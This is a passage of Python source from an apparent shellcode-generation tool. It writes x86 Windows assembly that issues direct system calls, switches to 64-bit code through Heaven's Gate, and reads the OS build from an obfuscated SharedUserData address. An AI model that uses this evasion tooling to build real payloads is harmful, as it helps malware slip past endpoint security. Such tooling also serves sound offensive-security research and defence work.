return "\n".join(lines) def chunkList(items, itemsPerChunk): for i in range(0, len(items), itemsPerChunk): yield items[i:i + itemsPerChunk] def buildApiBlocksFromSyscalls(syscallChoices, syscall_signature, funcsPerBlock=5, syscallHeaderSuffixes=None): """ Returns a list[str], where each element contains up to funcsPerBlock syscall sections. Example: api_blocks[0] = "this is for ... NtWriteVirtualMemory ...\n\nthis is for ... NtProtectVirtualMemory ..." """ if syscallHeaderSuffixes is None: syscallHeaderSuffixes = {} apiBlocks = [] for syscallChunk in chunkList(syscallChoices, funcsPerBlock): sections = [] for mySyscall in syscallChunk: sectionText = buildAiPromptSectionForSyscall( mySyscall=mySyscall, syscall_signature=syscall_signature, syscallHeaderSuffixes=syscallHeaderSuffixes ) sections.append(sectionText) apiBlocks.append("\n".join(sections).strip() + "\n") return apiBlocks def stripLeadingTextCaseInsensitive(text, prefix): if not text or not prefix: return text if text.lower().startswith(prefix.lower()): text = text[len(prefix):] return text.lstrip(" :-\t") def buildAiStructureMap(aiFinalResult): structureMap = {} if not aiFinalResult: return structureMap # structures = aiFinalResult.get("structures", {}) # if not isinstance(structures, dict): # return structureMap for structId, structDef in aiFinalResult.get("structures", {}).items(): if isinstance(structDef, dict): structureMap[structId] = structDef return structureMap def initAiState(aiFinalResult): if not aiFinalResult: return { "calls": [], "callIndex": 0, "structureMap": {} } return { "calls": aiFinalResult.get("calls", []), "callIndex": 0, "structureMap": buildAiStructureMap(aiFinalResult) } def getNextAiCallEntry(aiState): callIndex = aiState["callIndex"] callList = aiState["calls"] if callIndex >= len(callList): return None callEntry = callList[callIndex] aiState["callIndex"] += 1 return callEntry def getAiPushEntry(aiCallEntry, pushIndex): pushList = aiCallEntry.get("pushes", []) if pushIndex < len(pushList): pushEntry = pushList[pushIndex] pushValue = pushEntry.get("value", "0x00000000") additionalComment = pushEntry.get("additionalComment", "") structureRef = pushEntry.get("structureRef") else: pushValue = "0x00000000" additionalComment = "" structureRef = None return pushValue, additionalComment, structureRef def buildStructLinesFromAi(structureRef, aiState, commentColumn=24, showFieldType=True): if not structureRef: return "" structMap = aiState.get("structureMap", {}) if not isinstance(structMap, dict): return "" structDef = structMap.get(structureRef) if not isinstance(structDef, dict): return "" fields = structDef.get("fields", []) if not isinstance(fields, list) or not fields: return "" lines = [] semicolonPrefix = " " * (5 + commentColumn) + "; " start0 = whi + "Struct:" + res start = semicolonPrefix+start0 lines.append(start) for field in fields: fieldName = str(field.get("fieldName", "UNKNOWN")) fieldType = str(field.get("fieldType", "UNKNOWN")) fieldValue = str(field.get("fieldValue", "UNKNOWN")) fieldComment = field.get("fieldComment") if showFieldType: line = ( semicolonPrefix + mag + fieldType + res + " " + blu + fieldName + res + " = " + yel + fieldValue + res ) else: line = semicolonPrefix + mag + fieldName + res + " = " + yel + fieldValue + res if fieldComment: line += " " + yel + "(" + str(fieldComment) + ")" + res lines.append(line) return "\n".join(lines) + "\n" def sanitizeAdditionalComment(paramType, paramName, additionalComment): if additionalComment is None: return "" text = str(additionalComment).strip() if not text: return "" typeNamePair = paramType + " " + paramName # Case 1: full repetition like: # "ACCESS_MASK DesiredAccess ..." text = stripLeadingTextCaseInsensitive(text, typeNamePair) # Case 2: repeated param name like: # "DesiredAccess (THREAD_ALL_ACCESS)" text = stripLeadingTextCaseInsensitive(text, paramName) # Case 3: pointer boilerplate like: # "Pointer to HANDLE ThreadHandle (dummy pointer)" # "Pointer to OBJECT_ATTRIBUTES ObjectAttributes (NULL, defaulted)" if paramType.upper().startswith("P") and len(paramType) > 1: pointeeType = paramType[1:] text = stripLeadingTextCaseInsensitive(text, "Pointer to " + pointeeType + " " + paramName) text = stripLeadingTextCaseInsensitive(text, "Pointer to " + paramName) text = stripLeadingTextCaseInsensitive(text, "Pointer to " + pointeeType) # Case 4: sometimes comments repeat type only text = stripLeadingTextCaseInsensitive(text, paramType) # Clean up ugly leftovers text = text.strip() if text.startswith(","): text = text[1:].lstrip() if text.startswith("-"): text = text[1:].lstrip() return text def buildAlignedPushLine(pushValue, commentText, commentColumn=24): line = "push " + pushValue if commentText: padding = max(1, commentColumn - len(pushValue)) line += (" " * padding) + "; " + commentText return line def buildStructLines(structureRef, syscallEntry, commentColumn=24): if not structureRef: return "" structMap = syscallEntry.get("structures", {}) if not isinstance(structMap, dict): return "" structDef = structMap.get(structureRef) if not isinstance(structDef, dict): return "" fields = structDef.get("fields", []) if not isinstance(fields, list) or not fields: return "" lines = [] semicolonPrefix = " " * (5 + commentColumn) + "; " for field in fields: fieldName = str(field.get("fieldName", "UNKNOWN")) fieldValue = str(field.get("fieldValue", "UNKNOWN")) fieldComment = field.get("fieldComment") line = semicolonPrefix + mag + fieldName + res + " = " + yel + fieldValue + res if fieldComment: line += " " + yel + "(" + str(fieldComment) + ")" + res lines.append(line) return "\n".join(lines) + "\n" def buildSampleValsComment(paramType, paramName, additionalComment): cleanedComment = sanitizeAdditionalComment(paramType, paramName, additionalComment) baseComment = cya + paramType + res + " " + blu + paramName + res if cleanedComment: return baseComment + " " + yel + cleanedComment + res return baseComment def buildSyscall(print_to_file=False): # osChoices = ["4A62","3AD7", "47BA","1DB0", "55F0", "4A64"] # syscallChoices=["NtAllocateVirtualMemory", "NtCreateKey", "NtReplaceKey","NtSetContextThread", "NtSetValueKey"] com1=com2=com3=com4=com5=com6=com64=com9=comGetPC=com11=com10="\n" com8=com12=com13=com14=ws=xwin7L1=xwin7L2=xwin7L3=xwin7L4=xwin7L5=xwin7L6=xwin7L7=xwin7L7=comx64Ext1=comx64Ext2=comx64Ext3=comx64Ext4=comx64Ext5=comx64Ext6=comx64Ext7=comx64Ext8=comx64Ext9=comx64Ext10=comx64Ext11=comx64Ext12=comx64Ext13=comx64Ext14=comx64Ext15=comx64Ext16=comx64Ext17=comUSD=comUSDxor= com15=com16= com17=com18= com19=com20=com21=comhg=comhg86=comhg64="" if sh.show_comments: com1="\t\t; "+mag+"Syscall Function"+res+"\n" com2="\t\t\t; "+gre+"Windows 10/11 Syscall"+res+"\n" com3="\t\t\t; "+gre+"Windows 7 Syscall"+res+"\n" com4="\t\t; "+yel+"Push 0x33 selector for 64-bit"+res+"\n" com5="\t\t; "+yel+"Create return address for leaving kernel-mode"+res+"\n" com6="\t\t; "+yel+"Create destination for Heaven's gate"+res+"\n" com64="\t\t\t; "+mag+"Invoke Heaven's gate"+yel+"--transition to x64 code"+res+"\n" com86="\t\t\t; "+mag+"Invoke Heaven's gate"+yel+"--transition to x86 code"+res+"\n" comhg="\t\t\t; "+mag+"Invoke Heaven's gate"+res comhg86="\t\t\t; "+mag+"Invoke Heaven's gate"+yel+" -- go x86"+res comhg64="\t\t\t; "+mag+"Invoke Heaven's gate"+yel+" -- go x64"+res com8="\t; "+yel+"x64 code as bytes, leading to "+mag+"syscall"+res+"" com10="\n\t\t\t; "+yel+"x64 code: "+cya+"jmp qword ptr [r15+0F8h]"+res+"\n" com12="\t; "+yel+"Formatted for "+blu+"VisualStudio inline Assembly"+res com13="\t; "+cya+"jmp qword ptr [r15+0F8h]"+res+"" com14="\t; "+yel+"x64 code will enter kernel-mode and then return"+res+"" com15=res+"\t # "+yel+"Save 32-bit registers"+res com16=res+"\t # "+yel+"into WOW64_CONTEXT"+res com17=res+"\t # "+yel+"Save x86 EIP"+res com18=res+"\t # "+yel+"Save x86 ESP"+res com19=res+"\t # "+yel+"Save x86 EFlags"+res com20=res+"\t # "+yel+"Pointer to syscall args"+res com21=res+"\t # "+yel+"Get TurboThunk, if needed"+res com9="\t; "+yel+"Return from kernel-mode, back to 32-bit"+res+"\n" comGetPC="\t\t; "+yel+"GetPC"+res+"\n" ws=res+"; "+cya com11="\n\t\t\t; "+cya+"""mov r8d,dword ptr [esp] {}mov dword ptr [r13+0BCh],r8d {}add esp,0x4 {}mov dword ptr [r13+0C8h],esp {}mov rsp,qword ptr [r12+1480h] {}and qword ptr [r12+1480h],0 {}mov r11d,edx {}jmp qword ptr [r15+rcx*8]{} """.format(ws,ws,ws,ws,ws,ws,ws,res) com11Ex="\n\t\t\t; "+cya+"""xchg rsp,r14 {}mov r8d,dword ptr [r14] {}add r14,4 {}mov dword ptr [r13+3Ch],r8d{} {}mov dword ptr [r13+48h],r14d{} {}sub r14,4 {}lea r11,[r14+4] {} {}mov dword ptr [r13+20h],edi{} {}mov dword ptr [r13+24h],esi{} {}mov dword ptr [r13+28h],ebx {}mov dword ptr [r13+38h],ebp {}pushfq {}pop r8 {} {}mov dword ptr [r13+44h],r8d {}mov ecx,eax {}shr ecx,10h {} {}jmp qword ptr [r15+rcx*8]{} """.format(ws,ws,ws,com17, ws,com18,ws,ws,com20,ws,com15,ws, com16,ws,ws,ws,ws,com19,ws,ws,ws,com21,ws,res,ws,ws,ws,ws) comUSD="\t; " +cya+"User_Shared_Data:"+yel+" OSBuild "+res comUSDxor= "\t\t; " +gre+"XOR result = 0x7ffe0260,"+res xwin7L1="; "+cya+"mov r8d,dword ptr [esp]"+res xwin7L2="; "+cya+"mov dword ptr [r13+0BCh],r8df"+res xwin7L3="; "+cya+"add esp,0x4"+res xwin7L4="; "+cya+"mov dword ptr [r13+0C8h],esp"+res xwin7L5="; "+cya+"mov rsp,qword ptr [r12+1480h]"+res xwin7L6="; "+cya+"and qword ptr [r12+1480h],0"+res xwin7L7="; "+cya+"mov r11d,edx"+res xwin7L8="; "+cya+"jmp qword ptr [r15+rcx*8]"+res # com16=res+"\t # "+yel+"into WOW64_CONTEXT"+res # com17=res+"\t # "+yel+"Save x86 EIP"+res # com18=res+"\t # "+yel+"Save x86 ESP"+res # com19=res+"\t # "+yel+"Save x86 EFlags"+res # com20=res+"\t # "+yel+"Pointer to syscall args"+res # com21=res+"\t # "+yel+"Get TurboThunk, if needed"+res comx64Ext1="; "+cya+"xchg rsp,r14"+res comx64Ext2="; "+cya+"mov r8d,dword ptr [r14]"+res comx64Ext3="; "+cya+"add r14,4"+res comx64Ext4="; "+cya+"mov dword ptr [r13+3Ch],r8d {}".format(com17)+res comx64Ext5="; "+cya+"mov dword ptr [r13+48h],r14d {}".format(com18)+res comx64Ext6="; "+cya+"sub r14,4"+res comx64Ext7="; "+cya+"lea r11,[r14+4] {}".format("\t"+com20)+res comx64Ext8="; "+cya+"mov dword ptr [r13+20h],edi {}".format(com15)+res comx64Ext9="; "+cya+"mov dword ptr [r13+24h],esi {}".format(com16)+res comx64Ext10="; "+cya+"mov dword ptr [r13+28h],ebx"+res comx64Ext11="; "+cya+"mov dword ptr [r13+38h],ebp"+res comx64Ext12="; "+cya+"pushfq"+res comx64Ext13="; "+cya+"pop r8 {}".format("\t\t"+com19)+res comx64Ext14="; "+cya+"mov dword ptr [r13+44h],r8d"+res comx64Ext15="; "+cya+"mov ecx,eax"+res comx64Ext16="; "+cya+"shr ecx,10h {}".format("\t\t"+com21)+res comx64Ext17="; "+cya+"jmp qword ptr [r15+rcx*8]"+res comr12="\t\t; "+gre+"x64: "+cya+"mov ebx,dword ptr [r12]"+res comr12TEB="\t\t; "+yel+"Get TEB from TEB64"+res getPebr12_inline="""_emit 0x41 {} _emit 0x8b {} _emit 0x1c _emit 0x24 """.format(comr12,comr12TEB) getPebr12_nasm="""db 0x41,0x8b,0x1c,0x24{} {} """.format(comr12[1:],"",comr12TEB) if sh.comp()=="nasm": getPebr12=getPebr12_nasm elif sh.comp()=="inlineVS": getPebr12=getPebr12_inline if len(sh.osChoices2)==0 or len(sh.list_of_syscalls)==0: print(red+"\tInadequate number of syscalls selections or Windows releases to continue!"+res) return osChoices=sh.osChoices2 syscallChoices=sh.list_of_syscalls revSyscallChoices=syscallChoices.copy() revSyscallChoices.reverse() dictSyscallEDILocations={} listOfSyscallsAdded = [] # this allows only one per each, in order given! t=0 for each in syscallChoices: if each not in dictSyscallEDILocations: dictSyscallEDILocations[each]=t t+=1 # print ("syscallChoices") # print (syscallChoices) # print (red, "revSyscallChoices",res) # print (revSyscallChoices) # print ("dict") # print (dictSyscallEDILocations) # print ("end") ##### # 21h2 build 22000 55F0 # print (syscallChoices) # print ("revSyscallChoices", revSyscallChoices) endInitializer=""" saveSyscallArray: push eax mov edi, esp add edi, 0x4 mov esp, ecx """ if isWin7() and isWin1011() and not sh.user12Teb: initializerStart=""" mov eax, fs:[0x30] mov ebx, [eax+0xac] mov eax, [eax+0xa4] mov ecx, esp sub esp, 0x1000 """ elif isWin7() and isWin1011() and sh.user12Teb: initializerStart="""push 0x33 call GetPC1 GetPC1: add [esp], 5 retf{} """.format(comhg64) initializerStart+=getPebr12 initializerStart+="""push 0x23 call GetPC2 GetPC2: mov [esp+4], 0x23 add [esp], 0xa retf{} mov eax, [ebx+0x30] mov ebx, [eax+0xac] mov eax, [eax+0xa4] mov ecx, esp sub esp, 0x1000 """.format(comhg86) else: if (isWin7() and not sh.user12Teb) or (isWin1011() and not sh.useSharedData and not sh.user12Teb): initializerStart="""mov ebx, fs:[0x30] mov ebx, [ebx+0xac] mov ecx, esp sub esp, 0x1000 """ elif (isWin7() or (isWin1011()) and sh.user12Teb): initializerStart="""push 0x33 call GetPC1 GetPC1: add [esp], 5 retf{} """.format(comhg64) initializerStart+=getPebr12 initializerStart+="""push 0x23 call GetPC2 GetPC2: mov [esp+4], 0x23 add [esp], 0xa retf {} mov ebx, [ebx+0x30] mov ebx, [ebx+0xac] mov ecx, esp sub esp, 0x1000 """.format(comhg86) else: initializerStart="""mov ebx,0x7ffe0260 {} mov ebx, [ebx] mov ecx, esp sub esp, 0x1000 """.format(comUSD) if sh.encodeUSD and not sh.addUSD: initializerStart="""mov ebx,{} mov edx, {} xor ebx, edx {} mov ebx, [ebx] {} mov ecx, esp sub esp, 0x1000 """.format(hex(0x7ffe0260 ^sh.encodeUSDKey), hex(sh.encodeUSDKey), comUSDxor,"\t" +comUSD) if sh.encodeUSD and sh.addUSD: initializerStart="""mov ebx,{} mov edx, {} add ebx, {} xor ebx, edx {} mov ebx, [ebx] {} mov ecx, esp sub esp, 0x1000 """.format(hex((0x7ffe0260 ^sh.encodeUSDKey)-sh.addUSDVal), hex(sh.encodeUSDKey),hex(sh.addUSDVal), comUSDxor,"\t" +comUSD) if not sh.encodeUSD and sh.addUSD: initializerStart="""mov ebx,{} add ebx, {} mov ebx, [ebx] {} mov ecx, esp sub esp, 0x1000 """.format(hex(0x7ffe0260 -sh.addUSDVal),hex(sh.addUSDVal), "\t" +comUSD) endInitializer=""" saveSyscallArray: mov edi, esp mov esp, ecx """ checkOsRelease=generateInitializer=generateSyscallParams="" saveSyscallArray="""push edi """ basicWin7to11Syscall="\nourSyscall:"+com1 basicWin7to11Syscall+="""cmp dword ptr [edi-0x4],0xa jne win7 """ basicWin7to11Syscall+="\nwin10:"+com2 basicWin7to11Syscall+="""call dword ptr fs:[0xc0] ret """ basicWin7to11Syscall+="\nwin7:"+com3 basicWin7to11Syscall+="""xor ecx, ecx lea edx, [esp+4] call dword ptr fs:[0xc0] add esp, 4 ret""" ourSyscallx64Win71011Prologue="\nourSyscall:"+com1 ourSyscallx64Win71011Prologue+="""cmp dword ptr [edi-0x4],0xa jne win7 """ ourSyscallx64Win71011Prologue+="win10:" +com2 ourSyscallx64Win1011Basic="""call buildDestRet buildDestRet: add [esp], 0x17"""+com5 ourSyscallx64Win1011="push 0x33"+com4 ourSyscallx64Win1011+="call nextRetf"+comGetPC ourSyscallx64Win1011+="""nextRetf: add [esp], 5"""+com6 ourSyscallx64Win1011+="retf"+com64 # ourSyscallx64Win71011Prologue="win10:" +com2 ourSyscallx64Win1011Ex="push 0x33"+com4 ourSyscallx64Win1011Ex+="call nextRetf"+comGetPC ourSyscallx64Win1011Ex+="""nextRetf: add [esp], 5"""+com6 ourSyscallx64Win1011Ex+="retf"+com64 x64Win10="db 0x41,0xff,0xa7,0xf8,0x00,0x00,0x00 "+com8+com10 # sh.setComp("inlineVS") x64Win10Inline=""" _emit 0x41 {} _emit 0xff {} _emit 0xa7 {} _emit 0xf8 _emit 0x00 {} _emit 0x00 _emit 0x00 """.format(com8,"",com12,com13) x64Win10Ex="db 0x49,0x87,0xe6,0x45,0x8b,0x06,0x49,0x83,0xc6,0x04,0x45,0x89,0x45,0x3c,0x45,0x89,0x75,0x48,0x49,\n0x83,0xee,0x04,0x4d,0x8d,0x5e,0x04,0x41,0x89,0x7d,0x20,0x41,0x89,0x75,0x24,0x41,0x89,0x5d,0x28,0x41,\n0x89,0x6d,0x38,0x9c,0x41,0x58,0x45,0x89,0x45,0x44,0x89,0xc1,0xc1,0xe9,0x10,0x41,0xff,0x24,0xcf"+"\n\t\t"+com8+com11Ex x64Win10ExInline=""" _emit 0x49 {} _emit 0x87 {} _emit 0xe6 {} _emit 0x45 {} _emit 0x8b {} _emit 0x06 {} _emit 0x49 {} _emit 0x83 {} _emit 0xc6 {} _emit 0x04 {} _emit 0x45 {} _emit 0x89 {} _emit 0x45 {} _emit 0x3c {} _emit 0x45 {} _emit 0x89 {} _emit 0x75 {} _emit 0x48 {} _emit 0x49 {} _emit 0x83 _emit 0xee _emit 0x04 _emit 0x4d _emit 0x8d _emit 0x5e _emit 0x04 _emit 0x41 _emit 0x89 _emit 0x7d _emit 0x20 _emit 0x41 _emit 0x89 _emit 0x75 _emit 0x24 _emit 0x41 _emit 0x89 _emit 0x5d _emit 0x28 _emit 0x41 _emit 0x89 _emit 0x6d _emit 0x38 _emit 0x9c _emit 0x41 _emit 0x58 _emit 0x45 _emit 0x89 _emit 0x45 _emit 0x44 _emit 0x89 _emit 0xc1 _emit 0xc1 _emit 0xe9 _emit 0x10 _emit 0x41 _emit 0xff _emit 0x24 _emit 0xcf """.format(com8,"",comx64Ext1,comx64Ext2,comx64Ext3,comx64Ext4,comx64Ext5,comx64Ext6,comx64Ext7,comx64Ext8,comx64Ext9,comx64Ext10,comx64Ext11,comx64Ext12,comx64Ext13,comx64Ext14,comx64Ext15,comx64Ext16,comx64Ext17) if sh.comp()=="nasm": ourSyscallx64Win1011+=x64Win10 elif sh.comp()=="inlineVS": ourSyscallx64Win1011+=x64Win10Inline if sh.comp()=="nasm": ourSyscallx64Win1011Ex +=x64Win10Ex elif sh.comp()=="inlineVS": ourSyscallx64Win1011Ex +=x64Win10ExInline ourSyscallx64Epilogue="ret "+com9 ourSyscallx64Win1011+=ourSyscallx64Epilogue ourSyscallx64Win7Prologue= "\nwin7:"+com3 ourSyscallx64Win7= """xor ecx, ecx lea edx, [esp+4] push 0x33"""+com4 ourSyscallx64Win7+= "call nextRetf2"+comGetPC ourSyscallx64Win7+="""nextRetf2: add [esp], 5"""+com6 ourSyscallx64Win7+= "retf"+com64 x64Win7= "db 0x67,0x44,0x8b,0x04,0x24,0x45,0x89,0x85,0xbc,0x00,0x00,0x00,0x83,0xc4,0x04,0x41,0x89,0xa5,\n0xc8,0x00,0x00,0x00,0x49,0x8b,0xa4,0x24,0x80,0x14,0x00,0x00,0x49,0x83,0xa4,0x24,0x80,0x14,0x00,\n0x00,0x00,0x44,0x8b,0xda,0x41,0xff,0x24,0xcf"+"\t"+com8+com11 x64Win7Inline= """ _emit 0x67 {} _emit 0x44 {} _emit 0x8B {} _emit 0x04 _emit 0x24 {} _emit 0x45 {} _emit 0x89 {} _emit 0x85 {} _emit 0xBC {} _emit 0x00 {} _emit 0x00 {} _emit 0x00 {} _emit 0x83 _emit 0xc4 _emit 0x04 _emit 0x41 _emit 0x89 _emit 0xA5 _emit 0xC8 _emit 0x00 _emit 0x00 _emit 0x00 _emit 0x49 _emit 0x8B _emit 0xA4 _emit 0x24 _emit 0x80 _emit 0x14 _emit 0x00 _emit 0x00 _emit 0x49 _emit 0x83 _emit 0xA4 _emit 0x24 _emit 0x80 _emit 0x14 _emit 0x00 _emit 0x00 _emit 0x00 _emit 0x44 _emit 0x8B _emit 0xDA _emit 0x41 _emit 0xFF _emit 0x24 _emit 0xCF""".format(com8,"",com12,xwin7L1,xwin7L2,xwin7L3,xwin7L4,xwin7L5,xwin7L6,xwin7L7, xwin7L8) # sh.setComp("inlineVS") if sh.comp()=="nasm": ourSyscallx64Win7+=x64Win7 elif sh.comp()=="inlineVS": ourSyscallx64Win7+=x64Win7Inline ourSyscall="" if isWin7() and isWin1011(): if sh.style=="fs": ourSyscall=basicWin7to11Syscall+"\n" elif sh.style=="x64": ourSyscall =ourSyscallx64Win71011Prologue + ourSyscallx64Win1011Basic + ourSyscallx64Win1011 +ourSyscallx64Win7Prologue + ourSyscallx64Win7 elif sh.style=="x64Ex": ourSyscall =ourSyscallx64Win71011Prologue + ourSyscallx64Win1011Ex +ourSyscallx64Win7Prologue + ourSyscallx64Win7 elif isWin1011(): ourSyscallPrologue="\nourSyscall:"+com1 ourSyscallBasicWin1011="""call dword ptr fs:[0xc0] ret""" if sh.style=="fs": ourSyscall=ourSyscallPrologue + ourSyscallBasicWin1011+"\n" elif sh.style=="x64": ourSyscall = ourSyscallPrologue + ourSyscallx64Win1011Basic+ ourSyscallx64Win1011 elif sh.style=="x64Ex": ourSyscall = ourSyscallPrologue + ourSyscallx64Win1011Ex elif isWin7(): ourSyscallPrologue="\nourSyscall:"+com1 ourSyscallBasicWin7="""xor ecx, ecx lea edx, [esp+4] call dword ptr fs:[0xc0] add esp, 4 ret""" if sh.style=="fs": ourSyscall=ourSyscallPrologue + ourSyscallBasicWin7+"\n" elif sh.style=="x64": ourSyscall = ourSyscallPrologue + ourSyscallx64Win7 elif sh.style=="x64Ex": ourSyscall = ourSyscallPrologue + ourSyscallx64Win7 endShellcode0="""jmp end """ save="""jne win7 win10: call [fs:0xc0] ret win7: xor ecx, ecx lea edx, [esp+4] call [fs:0xc0] add esp, 4 ret""" endShellcode1=""" end: nop """ ##########Initialize Syscall Array t=1 numChoices=len(osChoices) for osChoice in osChoices: winVersion=builds.winOSReverseLookup[osChoice] hexOsChoice=builds.osChoiceToHex[osChoice] sizeOsBuild=len(hexOsChoice) osBStart=sizeOsBuild-2 osBuild=hexOsChoice[osBStart:] # print ("osBuild", osBuild) winReleaseText="" if sh.show_comments: if winVersion=="Windows 10": winReleaseText="; "+mag+builds.win10ReverseLookupBackup[osChoice] +", Win10 release"+res elif winVersion=="Windows 7": winReleaseText="; "+mag+builds.win7ReverseLookup[str(int(osChoice,16))] +" release"+res elif winVersion=="Windows 11": winReleaseText="; "+mag+builds.win11ReverseLookup[str(int(osChoice,16))] +" release"+res generateInitializer+="cmp bl, 0x"+osBuild+"\t\t" + winReleaseText + "\n" if t ==(numChoices): generateInitializer+="jl end" +"\n" else: generateInitializer+="jl less" +str(t) +"\n" for mySyscall in syscallChoices: # winVersion=winOSReverseLookupHex[osChoice] if mySyscall not in listOfSyscallsAdded: listOfSyscallsAdded.append(mySyscall) if winVersion=="Windows 10": winRelease=builds.win10ReverseLookupBackup[osChoice] elif winVersion=="Windows 7": winRelease=builds.win7ReverseLookupHex[osChoice] elif winVersion=="Windows 11": winRelease=builds.win11ReverseLookupHex[osChoice] # winRelease2=builds.win11ReverseLookupHex["ntallocatevirtualmemory"].casefold() # print ("winRelease", winRelease) mySyscallComment="" if sh.show_comments: mySyscallComment= "; "+ gre+mySyscall+res # print ("winRelease", winRelease, osChoice) temp="push " + hex(syscalls.reverseSyscall_dict[winVersion][winRelease][mySyscall]) + "\t\t" + mySyscallComment+"\n" # print (temp) generateInitializer+=temp # generateInitializer+="jmp done\n" if t !=(numChoices): generateInitializer+="jmp saveSyscallArray\nless" +str(t)+":\n" t+=1 revlistOfSyscallsAdded=listOfSyscallsAdded.copy() revlistOfSyscallsAdded.reverse() listOfSyscallsAdded.clear() wt=0 for each in revlistOfSyscallsAdded: dictSyscallEDILocations[each]=wt wt+=1 ################################## # z=0 # for mySyscall in syscallChoices: # sysPrototype= (syscall_signature[mySyscall]) # numSyscallParams=sysPrototype[0] # t=numSyscallParams-1 # generateSyscallParams+="push edi\n" # for each in range(numSyscallParams): # # temp="push 0x00000000 ; param " + str(t) # commentSyscallParams="" # if sh.show_comments: # commentSyscallParams="; " + cya+ sysPrototype[1][t] + " " + yel+ sysPrototype[2][t] +res # generateSyscallParams+="push 0x00000000 \t" + commentSyscallParams +"\n" # t-=1 # generateSyscallParams+="\n" if integrateAI: FUNCS_PER_BLOCK = 5 syscallHeaderSuffixes = {"NtProtectVirtualMemory": "with RWX"} api_blocks = buildApiBlocksFromSyscalls(syscallChoices=syscallChoices, syscall_signature=syscall_signature, funcsPerBlock=FUNCS_PER_BLOCK,syscallHeaderSuffixes=syscallHeaderSuffixes) aiFinalResult = buildPossibleValues(apiBlocks=api_blocks,chunkSize=1,resumeCurrent=False,autoSaveCurrent=False,baseDir=None,debugOutput=False) # print (aiFinalResult) aiState = initAiState(aiFinalResult) if integrateAI else None for mySyscall in syscallChoices: sysPrototype = syscall_signature[mySyscall] numSyscallParams = sysPrototype[0] t = numSyscallParams - 1 generateSyscallParams += "push edi\n" aiCallEntry = None if integrateAI: aiCallEntry = getNextAiCallEntry(aiState) for each in range(numSyscallParams): commentSyscallParams = "" paramType = sysPrototype[1][t] paramName = sysPrototype[2][t] # Path 3: OpenAI illustrative mode if integrateAI and aiCallEntry: pushValue, additionalComment, structureRef = getAiPushEntry(aiCallEntry, each) if sh.show_comments: commentSyscallParams = buildSampleValsComment(paramType,paramName,additionalComment) generateSyscallParams += buildAlignedPushLine(pushValue,commentSyscallParams) + "\n" if showStruct and structureRef: generateSyscallParams += buildStructLinesFromAi(structureRef,aiState) # Path 2: original offline illustrative mode elif sampleVals and mySyscall in syscallPossibleValues: syscallEntry = syscallPossibleValues[mySyscall] pushList = syscallEntry.get("pushes", []) if each < len(pushList): pushEntry = pushList[each] pushValue = pushEntry.get("value", "0x00000000") additionalComment = pushEntry.get("additionalComment", "") structureRef = pushEntry.get("structureRef") else: pushValue = "0x00000000" additionalComment = "" structureRef = None if sh.show_comments: commentSyscallParams = buildSampleValsComment(paramType,paramName,additionalComment) generateSyscallParams += buildAlignedPushLine(pushValue,commentSyscallParams) + "\n" if showStruct and structureRef: generateSyscallParams += buildStructLines(structureRef, syscallEntry) # Path 1: original no-sample-values mode else: if sh.show_comments: commentSyscallParams = cya + paramType + res + " " + blu + paramName + res generateSyscallParams += buildAlignedPushLine("0x00000000", commentSyscallParams) + "\n" t -= 1 generateSyscallParams += "\n" syscallComment="" z = dictSyscallEDILocations[mySyscall] if sh.show_comments: syscallComment="; " +gre+ mySyscall + " syscall"+res if z==0: generateSyscallParams+="mov eax, [edi]\t\t"+syscallComment+"\ncall ourSyscall\n\n" else: generateSyscallParams+="mov eax, [edi+"+hex(z*4)+"]\t"+syscallComment+"\ncall ourSyscall\n\n" # z+=1 ediRestoral=0 if sh.style=="fs": ediRestoral=hex(numSyscallParams*4) else: # ediRestoral=hex(4+numSyscallParams*4) ediRestoral=hex(numSyscallParams*4) stackCleanupRestore="mov edi, [esp+" + ediRestoral +"]\n\n" # stackCleanupRestore="add esp, " + hex(numSyscallParams*4) + "\n" // DEPRECATED # stackCleanupRestore+="pop edi\n\n" // DEPRECATED #### mov edi, [esp+0x] provides greater stability for a shellcode with a longer sequence of syscalls. generateSyscallParams +=stackCleanupRestore # print (win10ReverseLookup["15063"]) # print (hex(sysCallName)) finalSyscallShellcode= initializerStart+generateInitializer+endInitializer+generateSyscallParams+ endShellcode0+ ourSyscall + endShellcode1 out= finalSyscallShellcode finalSyscallShellcode = finalSyscallShellcode.replace(gre,'') finalSyscallShellcode = finalSyscallShellcode.replace(res,'') finalSyscallShellcode = finalSyscallShellcode.replace(mag,'') finalSyscallShellcode = finalSyscallShellcode.replace(yel,'') finalSyscallShellcode = finalSyscallShellcode.replace(blu,'') finalSyscallShellcode = finalSyscallShellcode.replace(res,'') finalSyscallShellcode = finalSyscallShellcode.replace(cya,'') finalSyscallShellcodeText=finalSyscallShellcode # finalSyscallShellcode = finalSyscallShellcode.replace(';','#') out2= finalSyscallShellcode # print (finalSyscallShellcodeText) #generate bytes # generateBytes(finalSyscallShellcode) if print_to_file: time = datetime.datetime.now() filetime = time.strftime("%Y%m%d_%H%M%S") win="Win" if isWin7(): win+="7" if isWin1011(): win+="1011" t=0 sys="" for each in sh.list_of_syscalls: if t<3: sys+=each+"_" t+=1 outputFileName=win+"_"+sys+filetime+".txt" output_dir = os.getcwd() myOutDir = "current_dir" #todo if myOutDir == "current_dir": output_dir = os.path.join(os.path.dirname(__file__), "Syscall Output") else: output_dir = myOutDir #todo txtFileName = os.path.join(output_dir, outputFileName) os.makedirs(os.path.dirname(txtFileName), exist_ok=True) text = open(txtFileName, "w") text.write (out2) # text.write(emulation_txt) text.close() print(red+" Saved file to: "+res, txtFileName) # if sh.printStringLiteral: # print(sRaw.bytesShellcode) # print(sRaw.shellCodeStrLit) return out SYSCALL_BOOL_DICT = { "l": False, "d": False, "D": False, "all": False, "xp": False, "xp1": False, "xp2": False, "s3": False, "s30": False, "s32": False, "s3r": False, "s3r2": False, "v": False, "v0": False, "v1": False, "v2": False, "s8": False, "s80": False, "s82": False, "s8r": False, "s8r1": False, "w7": False, "w70": False, "w71": False, "s12": False, "s120": False, "s12r": False, "w8": False, "w80": False, "w81": False, "w10": False, "r0": False, "r1": False, "r2": False, "r3": False, "r4": False, "r5": False, "r6": False, "r7": False, "r8": False, "r9": False, "r10": False} def selectFindOSBuildText(): if sh.encodeUSD: togE=res+"["+gre+"X"+res+"]" else: togE=res+"["+gre+" "+res+"]" if sh.addUSD: togA=res+"["+gre+"X"+res+"]" else: togA=res+"["+gre+" "+res+"]" togK=res+"["+gre+hex(sh.encodeUSDKey)+res+"]" togAV=res+"["+gre+hex(sh.addUSDVal)+res+"]" togP=res+"["+gre+" "+res+"]" if sh.useSharedData: togSD=res+"["+gre+"X"+res+"]" else: togSD=res+"["+gre+" "+res+"]" if sh.user12Teb: 